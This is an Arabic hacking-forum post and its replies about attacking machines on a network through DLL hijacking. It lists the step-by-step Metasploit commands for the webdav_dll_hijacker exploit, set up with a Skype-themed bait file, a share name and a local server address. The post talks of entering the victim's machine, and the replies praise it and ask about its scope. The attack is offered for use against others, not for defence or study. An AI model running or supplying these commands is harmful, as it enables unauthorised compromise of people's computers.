شرح عمل هجوم علي الشبكة عن طريق ثغرات الـ DLL Hijacking

[b]السلام عليكم ورحمة الله تعالي وبركاته

نعلم كثيرااا بثغرات ال dll hijacking

والتي ضهرت في عام 2007 ولاكن مايكروسوفت قالت أن الثغرة ليست بالاخطر

لاكن في 2010 قام الباحث الامريكي في مجال الامن قام بكتابة كود ضار يمكن استغلال الثغرة علي جهاز الضحية وتم إضافته في مشروع الميتا

وبعدهاا مبرمجواا الميتاسبلوايت قامواا ببرمجة أداة تكتشف ملفات ال dll يعني المكتبات الي فيهااا الثغرة

وضهرت الثغرة تقريبااا في كل البرامج اصيبت office 2010 والسكايب الفايرفوكس روح مواقع السكيورتي شوف وحتي برامج الهاكر … لاندكرهاا اللله يعين ddd

بعدهاا ضهرواا طريقة استغلال الثغرة

المهم الحقيقة فيه واحد صاحبي قال لي نزل لي فيديواا قلت له الاخ [/b][b]madjix

طرح موضوع فيه كل شئ من اكتشاف حتي الاستغلال

قالي حاب فيديواا تاعك :stuck_out_tongue:

صورة بعد دخول الجهاز [/b]

الاوامر بالترتيب

msf > use exploit/windows/browser/webdav_dll_hijacker

msf exploit(webdav_dll_hijacker) > set BASENAME credit_skype
BASENAME => credit_skype
msf exploit(webdav_dll_hijacker) > set EXTENSIONS skype
EXTENSIONS => skype
msf exploit(webdav_dll_hijacker) > set SHARENAME sec4ever
SHARENAME => sec4ever
msf exploit(webdav_dll_hijacker) > set SRVHOST 192.168.1.3
SRVHOST => 192.168.1.3
msf exploit(webdav_dll_hijacker) > exploit


الفيديواا هنا …

sec4ever

رائع يا اخي الفديو حقيقة تغرات ديناميك لينك ليبراري dll خطيرة وضهرت عديد من المواضيع عربية تتطرق لاستغلال
التغرة على ملفات الربط في البرامج
ان شاء الله تنشر التغرة كتيرا
ويعطيك العافية يا اخي على الطرح الرائع

الصراحه الثغره خطيره جداا … لاكن عندي سوال

هل الهجوم على الشبكه فقط …!!؟

GooD JoB Bro

في قمة الابداع يا البرايجي واصل …

تسلمواا علي المرور :stuck_out_tongue:

علي الشبكة فقط

على اصدار تعمل ?

صراحة ثغرة خطيرة جداا

عافاك الله جاري التحميل
بس لو رفعته ع الميديا فاير كآن افضل …
بس الله يعين جالس احمله الآن !!